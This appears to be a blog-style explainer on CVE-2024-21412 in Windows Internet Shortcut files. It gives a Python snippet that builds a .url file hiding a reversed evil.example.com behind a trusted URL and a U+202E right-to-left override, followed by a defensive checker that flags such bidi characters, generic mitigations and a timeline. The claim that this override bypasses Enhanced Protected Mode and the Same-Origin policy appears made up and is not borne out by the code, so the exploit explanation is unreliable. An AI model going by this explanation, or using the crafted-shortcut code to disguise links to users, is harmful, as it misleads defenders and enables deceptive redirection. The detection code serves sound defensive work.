Recently, a new vulnerability named CVE-2024-21412 has surfaced, related to Internet Shortcut files (.URL). This security feature bypass vulnerability could allow attackers to execute arbitrary code or redirect users to malicious URLs. In this long-read post, we dive into the vulnerability, its potential impact, and possible mitigation strategies. Along the way, we examine a code snippet and highlight the relevant exploit details.

What is CVE-2024-21412?

The Common Vulnerabilities and Exposures (CVE) system provides an identifier for publicly known cybersecurity vulnerabilities. CVE-2024-21412 refers to a security feature bypass vulnerability in Internet Shortcut files. These files, which carry the .URL extension, are special Windows files that create links to websites or other Internet-based resources. In this specific case, the vulnerability could be exploited by attackers to bypass security features and potentially execute arbitrary code.


Exploit Details

The exploit makes use of weaknesses in the way Internet Shortcut files handle URLs to bypass security features such as Microsoft's Enhanced Protected Mode (EPM) and the browser's Same-Origin policy. The vulnerability lies in the way these files parse and validate the URLs before launching the target website.

Here is an example code snippet that demonstrates the vulnerability:

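import os

# Example hosts used in this post: the trusted site and the attacker's site.
malicious_url = "http://evil.example.com"
# Trusted URL, then U+202E (Right-to-Left Override), then the malicious URL reversed.
crafted_url = "http://trusted.example.com" + "\u202e" + malicious_url[::-1]

# Build the [InternetShortcut] section with the crafted URL= entry.
internet_shortcut_content = "[InternetShortcut]" + os.linesep
internet_shortcut_content += "URL=" + crafted_url + os.linesep

with open("CVE-2024-21412.url", "w") as url_file:
    url_file.write(internet_shortcut_content)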

In this code snippet, the malicious URL (http://evil.example.com) is reversed and appended to the legitimate/trusted URL (http://trusted.example.com) after the Unicode character U+202E (Right-to-Left Override), creating a new crafted URL. Then, an Internet Shortcut file "CVE-2024-21412.url" is created containing the crafted URL. When double-clicked by a user, the file will open the malicious site (http://evil.example.com) in the browser, bypassing the expected security features.

When executing the CVE-2024-21412 exploit, the following behavior is observed:

- The user opens the Internet Shortcut file, expecting to navigate to the legitimate/trusted website.
- Due to the vulnerability, the browser navigates to the malicious URL contained within the Internet Shortcut file, without triggering the security features designed to prevent such behavior.

Potential Impact and Mitigations

Given its potential to expose users to malicious URLs and execute arbitrary code, CVE-2024-21412 poses a significant security risk. To mitigate this risk, consider implementing the following strategies:

1. Keep your software up to date: Make sure to apply the latest security patches and updates for your operating system, web browsers, and other software.
2. Disable Internet Shortcut files: Consider restricting the use of Internet Shortcut files on your network, especially if they are not necessary for normal operations.
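
A defensive check for the pattern in the snippet above, as an added example that is not part of the original post: it parses the text of a .url file and reports any URL= value that contains a Unicode bidirectional control such as U+202E. The function names, report format and sample strings are constructed for illustration.

```python
import sys
import unicodedata

# Unicode bidirectional formatting controls: marks, embeddings, overrides, isolates.
BIDI_CONTROLS = frozenset(
    "\u061c\u200e\u200f\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069"
)

# Constructed samples. The crafted one follows the pattern in the post's snippet.
SAMPLE_CLEAN = "[InternetShortcut]\r\nURL=https://trusted.example.com/\r\n"
SAMPLE_CRAFTED = (
    "[InternetShortcut]\r\n"
    "URL=http://trusted.example.com\u202emoc.elpmaxe.live//:ptth\r\n"
)


def shortcut_urls(text):
    """Yield each URL= value found in the [InternetShortcut] section."""
    section = ""
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "internetshortcut" and "=" in line:
            key, value = line.split("=", 1)
            if key.strip().lower() == "url":
                yield value.strip()


def inspect_shortcut(text):
    """Return one report per URL= value that contains a bidi control."""
    reports = []
    for value in shortcut_urls(text):
        hits = [(i, unicodedata.name(c)) for i, c in enumerate(value)
                if c in BIDI_CONTROLS]
        if hits:
            # unicode_escape shows the stored (logical) order, not the rendered one.
            escaped = value.encode("unicode_escape").decode("ascii")
            reports.append({"escaped": escaped, "controls": hits})
    return reports


if __name__ == "__main__":
    # Hypothetical usage: python check_url_files.py file1.url file2.url
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8-sig", errors="replace") as fh:
            for report in inspect_shortcut(fh.read()):
                print(path, report["escaped"], report["controls"])
```

The escaped form prints the stored character order, so a reviewer sees the override character as `\u202e` instead of the visually reordered text.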

Conclusion

CVE-2024-21412 is a security feature bypass vulnerability in Internet Shortcut files that exposes users to potential attacks. By understanding the exploit details, potential impact, and mitigation strategies, you can take steps to protect your network and users from falling victim to this vulnerability.

Timeline

Published on: 02/13/2024 18:15:59 UTC
Last modified on: 02/15/2024 02:00:01 UTC